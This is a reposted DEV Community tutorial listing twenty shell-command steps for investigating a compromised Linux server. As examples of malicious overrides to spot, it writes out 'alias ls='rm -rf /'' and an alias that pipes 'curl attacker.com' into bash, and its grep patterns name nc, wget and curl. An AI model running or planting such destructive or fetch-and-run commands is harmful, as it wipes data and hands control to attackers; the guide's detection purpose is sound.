# How to Investigate a Compromised Linux Server



This content originally appeared on DEV Community and was authored by Farzan Afringan

🧭 Introduction

When a Linux server is compromised, every second counts. Attackers may have already opened backdoors, created hidden users, or tampered with critical files. Whether you’re a sysadmin, DevOps engineer, or a security enthusiast, knowing how to perform a basic post-breach investigation is essential. In this article, we’ll walk through practical steps to check for suspicious sessions, new users, altered files, and other indicators of compromise — all using simple shell commands.

🧑‍💻 Step 1: Check Active SSH and User Sessions

The first step after a suspected breach is identifying who is currently logged in and from where.

🔸 Check current SSH logins:

who
last -i
w

These commands help detect any suspicious or unexpected sessions — especially those from unusual IP addresses or users you don’t recognize. Look for:

  • Multiple open sessions
  • Unknown usernames
  • IP addresses outside your organization or country
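To spot outliers quickly, you can summarize login source addresses from the wtmp history. This is a rough sketch: the field layout of `last -i` output can vary slightly between distros, so adjust the awk field index if your output differs.

```shell
# Count logins per source IP from wtmp history ($3 is usually the
# host/IP column in `last -i` output)
last -i | awk 'NF >= 3 && $3 ~ /^[0-9]+\./ { print $3 }' \
  | sort | uniq -c | sort -rn
```

An address with an unusually high count, or one you simply do not recognize, is a good first lead.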

🧑‍🔬 Step 2: Look for Suspicious New Users

After a breach, attackers often create hidden or non-standard user accounts to retain access.

🔸 List all users from /etc/passwd:

cut -d: -f1 /etc/passwd

This command extracts the first field from each /etc/passwd entry, giving you every account name on the system.

Look for:

  • Usernames that don’t follow your system’s naming convention

  • Recently added accounts

  • Accounts with login shells like /bin/bash (vs. /sbin/nologin or /usr/sbin/nologin)
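To focus on accounts that can actually log in, you can filter /etc/passwd by login shell. A small sketch (the shell list here is an assumption; extend it if your environment uses other interactive shells):

```shell
# Print name, UID, and shell for accounts with an interactive-looking shell
awk -F: '$7 ~ /(bash|zsh|sh)$/ { print $1, $3, $7 }' /etc/passwd
```

Any unexpected account in this short list deserves a closer look.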

You can also sort users by creation time (if your distro tracks /home timestamps):

ls -lt /home

🕵‍♂ Step 3: Identify Recently Modified or Suspicious Files

After gaining access, attackers often modify configuration files, upload malware, or leave behind backdoors. Checking for recently changed files can reveal important clues.

🔸 Find recently modified files:

find /etc -type f -mtime -5 2>/dev/null

This command lists all regular files in /etc that were modified in the last 5 days. You can change -5 to any number of days depending on when you suspect the compromise occurred.

You can also check for recently modified files system-wide:

find / -type f -mtime -5 -ls 2>/dev/null

🔸 Look for:

  • Modifications to SSH config: /etc/ssh/sshd_config

  • Unexpected cron jobs: /etc/cron*

  • Backdoors in bash/profile scripts: .bashrc, .bash_profile, /etc/profile, etc.

  • Files with strange names or locations like /tmp/.xyz, /var/tmp/.abc, or /dev/shm/shell
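Since the world-writable staging directories above are the most common drop zones, a targeted sweep there is often faster than a full filesystem scan:

```shell
# List files (including hidden ones) recently changed in common attacker
# staging directories; adjust -mtime to your suspected compromise window
find /tmp /var/tmp /dev/shm -xdev -type f -mtime -5 -ls 2>/dev/null
```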

🔒 Step 4: Check for Unauthorized Scheduled Tasks

🔸 Check system-wide cron jobs:

cat /etc/crontab
ls -l /etc/cron.*

🔸 Check user-specific cron jobs:

for user in $(cut -d: -f1 /etc/passwd); do
  echo "### $user"; crontab -l -u "$user" 2>/dev/null
done

🧠 Step 5: Analyze Running Processes for Anomalies

After a breach, attackers often run hidden or suspicious processes to maintain persistence. Investigating running processes can reveal malware, reverse shells, or rogue services.

🔸 List all active processes:

ps auxf

🔸 Sort processes by start time to catch recent entries:

ps -eo pid,ppid,user,args --sort=start_time

Look for:

  • Processes running from unusual directories like /tmp, /dev/shm, or /var/tmp

  • Legitimate-looking names (e.g., apache, kworker, cron) running from shady paths

  • Processes owned by regular users but performing high-privilege tasks

  • Long-running shell or Python processes without an obvious purpose
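For any process that looks off, /proc lets you confirm which binary is actually running and from where — even when the on-disk file was deleted after launch. The PID below is a hypothetical example; substitute the one you found with ps:

```shell
pid=1234   # hypothetical suspect PID — substitute the one from ps
ls -l "/proc/$pid/exe" "/proc/$pid/cwd" 2>/dev/null   # real binary and working dir
tr '\0' ' ' < "/proc/$pid/cmdline" 2>/dev/null; echo   # full command line
```

If the exe symlink ends in "(deleted)", the process is running from a binary that no longer exists on disk — a strong red flag.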

🌐 Step 6: Inspect Network Connections and Open Ports

A compromised server often has active connections to attacker-controlled hosts or is listening on unexpected ports. Monitoring network activity is crucial for spotting data exfiltration, reverse shells, or backdoors.

🔸 Show all active network connections:

ss -tulnp

Or, if ss isn’t available:

netstat -tulnp

🔸 Check for established outbound connections:

ss -tanp | grep ESTABLISHED

Look for:

  • Listening services on high or uncommon ports

  • Processes listening on 0.0.0.0 (all interfaces) unexpectedly

  • Connections to unfamiliar IPs, especially on ports like 4444, 8080, 1337, or other non-standard ports

  • Reverse shell patterns (e.g., an outbound connection from a shell binary)
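To get a quick list of unique remote peers, you can post-process the ss output. This is a sketch for IPv4 only (the colon split breaks on IPv6 addresses; with a state filter, the peer address is the fourth column):

```shell
# Unique remote IPv4 addresses with established TCP connections
ss -tn state established | awk 'NR > 1 { split($4, a, ":"); print a[1] }' | sort -u
```

Any address here that you cannot tie to a known service or user is worth investigating.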

🕵‍♂ Step 7: Inspect Shell Initialization Files and Aliases

Attackers often leave behind persistent access via bash aliases, modified shell initialization files, or backdoors hidden in commonly loaded scripts. These files are executed automatically when a user logs in, making them a perfect place for stealthy payloads.

🔸 Check .bashrc, .bash_profile, and .profile for suspicious entries:

grep -E '\b(alias|nc|wget|curl|python|bash)\b' /home/*/.bashrc /home/*/.bash_profile /home/*/.profile 2>/dev/null

🔸 Also check system-wide equivalents:

grep -E '\b(alias|nc|wget|curl|python|bash)\b' /etc/bash.bashrc /etc/profile 2>/dev/null

Look for:

  • Aliases that override standard commands (e.g., alias ls='rm -rf /')

  • Calls to nc, curl, wget, python, bash, or remote URLs

  • Obfuscated or base64-encoded commands

  • Auto-executed reverse shells or unknown binaries
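Obfuscated payloads often slip past simple keyword greps, so a second pass looking specifically for decode-and-execute patterns is worthwhile. A sketch (the regex is a heuristic, not an exhaustive detector):

```shell
# Flag decode-and-execute patterns in user shell init files
grep -RniE 'base64 (-d|--decode)|eval *\$\(|\| *(ba)?sh\b' \
  /home/*/.bashrc /home/*/.bash_profile /home/*/.profile 2>/dev/null
```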


🧑‍🔧 Step 8: Check for Unauthorized Root or Sudo Users

Attackers often add themselves to privileged groups like sudo or wheel to maintain full control over the system. It’s critical to identify all users with elevated permissions.

🔸 List users in the sudo group:

getent group sudo

On RHEL / AlmaLinux / CentOS systems, use:

getent group wheel

You should also check for accounts with UID 0, which indicates root-level access:

awk -F: '$3 == 0 { print $1 }' /etc/passwd

🔍 Watch out for:

  • Unknown usernames in sudo or wheel groups

  • Multiple accounts with UID 0

  • Suspicious or generic-looking usernames with elevated privileges

If you find any unfamiliar entries, investigate immediately — especially if they were created recently.

📜 Step 9: Analyze Log Files for Signs of Intrusion

System log files are one of the most important sources of evidence when investigating a compromised Linux server. They can help you track login attempts, sudo activity, privilege escalation, and other unauthorized actions.

# For authentication attempts and sudo usage
cat /var/log/auth.log        # Debian/Ubuntu
cat /var/log/secure          # RHEL/CentOS/AlmaLinux

# General system messages (including kernel & service errors)
cat /var/log/messages

# SSH activity
grep sshd /var/log/auth.log  # or /var/log/secure

# Recent logins with sudo
grep 'sudo' /var/log/auth.log

🔍 Look for:

  • Multiple failed login attempts (brute force patterns)

  • Logins from unexpected IP addresses or at unusual times

  • Unrecognized use of sudo or su

  • Commands run with elevated privileges

  • Creation of new users or modification of existing ones

  • Signs of tampering (e.g., log cleared, log rotated suspiciously)
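Brute-force patterns jump out when you aggregate failed attempts by source address. A sketch for the Debian-style auth.log (use /var/log/secure on RHEL-family systems):

```shell
# Top source IPs for failed SSH password attempts
grep 'Failed password' /var/log/auth.log 2>/dev/null \
  | awk '{ for (i = 1; i <= NF; i++) if ($i == "from") print $(i + 1) }' \
  | sort | uniq -c | sort -rn | head
```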

💡 Tip: You can use less, grep, or journalctl for better searching:

journalctl -xe
grep -i 'failed\|invalid\|error' /var/log/auth.log

🔐 Step 10: Inspect SSH Keys and Remote Access Configurations

After a compromise, attackers often install their own SSH keys to maintain silent, passwordless access even if you change user passwords. It’s crucial to audit your SSH key configurations.

🔸 Check for unfamiliar or suspicious SSH keys:

cat ~/.ssh/authorized_keys

Also review other users’ SSH keys:

find /home -type f -name "authorized_keys" -exec cat {} \; 2>/dev/null

Check for:

  • Long unfamiliar key strings

  • Keys added recently (check file modification date: ls -l ~/.ssh/authorized_keys)

  • Multiple keys for users who shouldn’t have remote access
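To get a quick inventory of how many keys each account trusts, you can count key lines per authorized_keys file. A sketch (the key-type prefixes matched here are an assumption; add others your environment uses):

```shell
# Count trusted public keys per authorized_keys file
find /home /root -path '*/.ssh/authorized_keys' -type f 2>/dev/null \
  | while read -r f; do
      printf '%s: %s key(s)\n' "$f" "$(grep -cE '^(ssh-|ecdsa-)' "$f")"
    done
```

Any count higher than you expect for a given user means extra keys to account for.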

🔸 Inspect system-wide SSH configuration:

cat /etc/ssh/sshd_config

Look for:

  • PermitRootLogin yes → 🚨 risky if enabled

  • PasswordAuthentication yes → 🚨 allows brute-force attacks

  • AuthorizedKeysFile → ensure it’s not pointing to suspicious locations

  • AllowUsers or DenyUsers → check for unexpected entries

💡 Tip: Also check for hidden .ssh folders:

find /home -type d -name ".ssh" -ls 2>/dev/null

🧰 Step 11: Audit Installed Tools and Potentially Abused Binaries

Attackers often rely on common Linux tools like curl, wget, python, or netcat (nc) for downloading payloads, creating reverse shells, or exfiltrating data. It’s important to ensure these tools haven’t been replaced or abused.

🔸 Check for suspicious binaries or modifications:

which curl wget nc python bash

Then verify their integrity (Debian/Ubuntu example):

dpkg -V curl wget netcat-openbsd python3 bash

On RHEL/AlmaLinux/CentOS:

rpm -V curl wget nmap-ncat python3 bash

Look for:

  • Unexpected file changes

  • Binaries with altered sizes or checksums

  • Replaced tools located in suspicious paths like /tmp, /dev/shm, /home/user/.local/bin

🔸 Search for alternative tools or renamed backdoors:

find / -type f -perm /111 -exec file {} \; 2>/dev/null | grep -i "elf"

This helps locate all executable binaries across the system, useful to catch renamed tools or binaries dropped by attackers.

💡 Tip: Pay special attention to:

  • Binaries in /usr/local/bin, /tmp, or /home/*/.local/bin

  • Custom versions of known tools like python, nc, or bash

  • Hidden files starting with . (e.g., .bash, .curl)

📜 Step 12: Review System Logs for Signs of Intrusion

System logs are one of the most valuable sources for understanding what happened before, during, and after a compromise. Reviewing these logs can reveal unauthorized login attempts, privilege escalation, command histories, and more.

🔸 Check authentication logs:

On Debian/Ubuntu:

less /var/log/auth.log

On RHEL/AlmaLinux/CentOS:

less /var/log/secure

Look for:

  • Failed or unusual login attempts

  • Successful root logins (session opened for user root)

  • Sudden group membership changes (e.g., added to sudoers)

🔸 Check system reboots and shutdowns:

last reboot
last -x shutdown

Unscheduled reboots or shutdowns may signal that an attacker rebooted the system after making changes.

🔸 Review sudo usage:

grep 'sudo:' /var/log/auth.log

Or:

grep 'sudo:' /var/log/secure

Look for:

  • Suspicious sudo commands

  • Privilege escalation by unknown or unauthorized users

🔸 Check for suspicious logins from unknown IPs:

last -i | grep -v 'your-known-ip-or-subnet'

💡 Tip: Focus on events close to the suspected breach time — sudden login spikes, unexpected root access, or new user creation around that time are all red flags.

🧩 Step 13: Check for Aliases and Function Overrides (Command Hijacking)

One sneaky trick attackers use is command hijacking — redefining commonly used commands with malicious alternatives via shell aliases or functions. These overrides are often invisible unless you explicitly check for them.

🔸 List all active aliases in the current shell:

alias

Watch for malicious overrides such as:

alias ls='rm -rf /'
alias cat='curl attacker.com | bash'

Or any alias pointing to remote scripts or unknown binaries.

🔸 List all shell functions (may override real commands):

declare -f

This shows all function definitions in the current shell. Look for:

  • Functions named after common commands (ls, cat, ps, whoami)

  • Suspicious content in those functions, such as base64, curl, nc, or reverse shell payloads

🔸 Check system-wide aliases:

grep alias /etc/bash.bashrc /etc/profile 2>/dev/null

Or:

grep -E 'alias|function' /etc/*rc /etc/profile 2>/dev/null

🛡 If you find any overrides, especially for commonly used commands, remove or comment them out immediately and investigate further.

🌍 Step 14: Inspect User Environment Variables and PATH Manipulation

Attackers sometimes modify environment variables to alter system behavior or hide malicious activity. The most common targets are:

  • PATH — to hijack command resolution

  • LD_PRELOAD, LD_LIBRARY_PATH — for injecting malicious libraries

  • PS1 — to spoof shell prompts and trick admins

🔸 Inspect the current environment variables:

env

Pay attention to:

  • PATH containing suspicious directories like /tmp or /dev/shm, or unknown entries at the beginning (attackers may place their binaries there to override real commands)

  • LD_PRELOAD or LD_LIBRARY_PATH — these should be empty or unset unless specifically configured
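Beyond per-session variables, the system-wide preload file is a classic library-injection persistence spot and is worth checking explicitly:

```shell
# /etc/ld.so.preload should normally not exist (or be empty); any .so
# listed here is injected into every dynamically linked program
cat /etc/ld.so.preload 2>/dev/null

# Session-level injection variables should be unset unless you set them
env | grep -E '^(LD_PRELOAD|LD_LIBRARY_PATH)=' || echo "no LD_* injection vars set"
```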

🔸 Check for .bashrc or .profile modifications:

grep PATH ~/.bashrc ~/.profile

Look for malicious prepending like:

export PATH="/tmp/bin:$PATH"


🔸 Check for PS1 spoofing (fake prompt):

echo $PS1

A normal PS1 might look like:

[\u@\h \W]\$

But a spoofed one could hide user/root identity, current directory, or other cues.

🛡 If any of these look suspicious, investigate the corresponding file (like .bashrc, .profile, etc.) and sanitize it.

🧾 Step 15: Review Command History for Suspicious Activity

Shell history files can be a goldmine during post-breach analysis — especially if the attacker wasn’t careful or didn’t wipe them.

🔸 Check the current user’s history:

cat ~/.bash_history

🔸 Check history files for all users:

find /home -name ".*_history" -exec ls -l {} \;

To inspect the contents:

find /home -name ".*_history" -exec cat {} \; 2>/dev/null

🔍 Look for:

  • Usage of tools like nc, curl, wget, python, bash

  • Cleanup commands like history -c or unset HISTFILE

  • Installation of suspicious packages or SSH config changes

  • File permission modifications (e.g., chmod 777, chattr)

  • Downloading or executing unknown scripts

💡 Tip: If you see that the history file is empty or missing, it could be a sign that the attacker tried to cover their tracks.

🧯 Step 16: Detect Log Wiping or Tampering

One of the first things a smart attacker does is cover their tracks by wiping or manipulating log files. Detecting this tampering can confirm a breach and help you estimate its timeline.

🔸 Look for unusually small or recently emptied log files:

ls -l /var/log | sort -k5 -n

This sorts logs by size. Be suspicious of logs like auth.log, secure, or messages that are abnormally small or have been modified recently.

🔸 Check file modification times:

stat /var/log/auth.log
stat /var/log/secure

Look at the Modify and Change timestamps — a sudden update without corresponding activity inside the file may suggest wiping.

🔸 Check logrotate activity:

cat /etc/logrotate.conf
ls -l /etc/logrotate.d/

If logs were rotated right before or after suspicious activity, check backups or older rotated files:

ls -l /var/log/*.gz
zcat /var/log/auth.log.1.gz | grep 'ssh'

🔍 Watch out for:

  • Log files with suspiciously recent timestamps

  • Sudden drops in log size

  • Missing or empty logs (auth.log, secure, messages, bash_history)

  • Logs ending in the middle of a session (incomplete entries)

🧬 Step 17: Investigate Kernel-Level Rootkits

Rootkits are stealthy tools attackers use to hide their presence, intercept system calls, and bypass detection mechanisms. Kernel-level rootkits are especially dangerous because they can modify how the system behaves at a low level.

🔸 Check for known rootkits with chkrootkit:

sudo apt install chkrootkit   # Debian/Ubuntu
sudo chkrootkit

Or on RHEL/CentOS:

sudo yum install chkrootkit   # may require the EPEL repository
sudo chkrootkit

🔸 Use rkhunter (Rootkit Hunter):

sudo apt install rkhunter
sudo rkhunter --update
sudo rkhunter --check

🔍 These tools check for:

  • Known rootkit signatures

  • Unexpected binaries in system paths

  • Hidden processes or network ports

  • Modified kernel modules

🔸 Manually inspect loaded kernel modules:

lsmod

Compare against a baseline if you have one. Look for unfamiliar or oddly named modules.
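If you have no baseline, one rough heuristic is to flag loaded modules that modinfo cannot resolve to on-disk metadata; legitimate distro modules almost always have it. A sketch (note that legitimate out-of-tree modules, e.g. DKMS builds, can also trigger this):

```shell
# Flag loaded modules that modinfo can't find metadata for
lsmod | awk 'NR > 1 { print $1 }' | while read -r m; do
  modinfo "$m" > /dev/null 2>&1 || echo "no modinfo entry: $m"
done
```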

🔸 Check for hidden ports or kernel hooks (advanced):

netstat -ntulp   # Already covered — compare again here
dmesg | grep -i hook

⚠ Red Flags:

  • Detection of known rootkits (RH-Sharpe, Adore, Knark, etc.)

  • Kernel modules you don’t recognize

  • Logs showing unexpected loading/unloading of modules

If rootkits are detected, it’s safer to reinstall the OS and restore from a known clean backup.

⏰ Step 18: Monitor Suspicious One-Time or Scheduled Tasks via at and systemd timers

While cron jobs are a common place to check for persistence, attackers may also leverage lesser-known scheduling mechanisms like at jobs and systemd timers to execute malicious scripts at specific times — often escaping notice.

🔸 Check for pending at jobs:

atq

This lists one-time scheduled jobs for the current user. If you see anything suspicious:

atrm <job-number>

This removes the scheduled job before it runs.

🔸 List all active and inactive systemd timers:

systemctl list-timers --all

This shows all systemd timers and their associated services. Pay attention to:

  • Timers with odd names or generic ones like backup.timer, sync.timer

  • Timers pointing to unknown or untracked scripts (e.g., in /tmp/, /var/tmp/, /dev/shm/)

🔸 Investigate a suspicious timer:

systemctl cat <timer-name>

Then inspect its related service:

systemctl cat <service-name>

🕵‍♂ Red Flags:

  • Timers triggering scripts in non-standard directories

  • Recently added timers with unclear purposes

  • Timers set to execute shortly after boot or at unusual times

  • at jobs queued without documentation or known reason

🧱 Step 19: Scan for Unauthorized SetUID and SetGID Binaries

Attackers often exploit SetUID (SUID) and SetGID (SGID) binaries to escalate privileges or maintain persistent access. These special permissions allow a program to run with the privileges of the file owner or group — even if the user executing it doesn’t have those rights.

🔸 Find all SetUID binaries (run as root even by normal users):

find / -perm -4000 -type f 2>/dev/null

This command searches the entire system for files with the SetUID bit (4000) set.

🔸 Find all SetGID binaries (run with group privileges):

find / -perm -2000 -type f 2>/dev/null

Look carefully for:

  • Binaries not normally present on your system

  • Scripts or binaries in unusual directories like /tmp, /dev/shm, /var/tmp, or user home directories

  • Files with recent modification timestamps

🔍 Red Flags:

  • Custom binaries with SetUID in non-system paths

  • Known binaries that have been tampered with

  • Tools like nmap, perl, python, find, or cp with unexpected SetUID bits (which can be used for privilege escalation)

  • Binaries that shouldn’t be SUID at all (check against your distro’s baseline)
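If you captured a SUID inventory from a known-clean build, diffing against it surfaces additions immediately. A sketch — the baseline path below is hypothetical, standing in for a file you created at provisioning time:

```shell
# Snapshot the current SUID inventory and diff against a clean baseline
# (/root/suid.baseline is a hypothetical file saved from a known-clean system)
find / -xdev -perm -4000 -type f 2>/dev/null | sort > /tmp/suid.now
diff /root/suid.baseline /tmp/suid.now   # lines marked '>' are new SUID files
```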

🛡 Tip:
To compare your system against a known-safe baseline, you can install a package integrity tool like debsums (Debian/Ubuntu) or use rpm -V (RHEL-based distros) to verify file changes.

🕳 Step 20: Investigate Hidden Files and Directories

Attackers commonly use hidden files and directories (those starting with a dot .) to store malicious payloads, backdoors, or staging tools in a way that avoids detection during casual inspection.

🔸 Search for hidden files and directories in home paths:

find /home -name ".*" -type f -ls 2>/dev/null
find /home -name ".*" -type d -ls 2>/dev/null

🔸 Search system-wide for hidden files (excluding standard paths):

find / -type f -name ".*" ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" 2>/dev/null

🔍 What to look for:

  • Unusual filenames like .xyz, .config.old, .update, .bash_history.bak

  • Hidden files inside /tmp, /dev/shm, /var/tmp, or user home directories

  • Files with obfuscated or binary content

  • Files with recent modification times, especially if they weren’t there before the compromise

🔸 List all hidden files and folders in /tmp, /var/tmp, and /dev/shm:

find /tmp /var/tmp /dev/shm -maxdepth 1 -name ".*" -ls 2>/dev/null

🛡 Tip:
Hidden files in locations like /root, /home/user/.cache, or .ssh/ may contain malware, reverse shell scripts, or malicious SSH keys.

If you’re unsure about a file, run file and strings on it:

file /tmp/.suspicious
strings /tmp/.suspicious | less

✅ Conclusion

Investigating a compromised Linux server requires a careful, methodical approach — and speed matters. The 20 steps we covered here give you a solid foundation to detect suspicious activity, identify persistence mechanisms, and regain control of your system.

Stay vigilant, automate wherever possible, and always log your findings.

📌 In the next article, we’ll explore deeper topics like rootkits, log correlation, digital forensics tools, and how to properly rebuild or harden a server post-breach.

Feel free to share your thoughts or tools you use in your own investigations!

🔗 Let’s Connect

If you found this article useful or have questions, feel free to reach out or follow me:

Stay tuned — more security and Linux content coming soon!

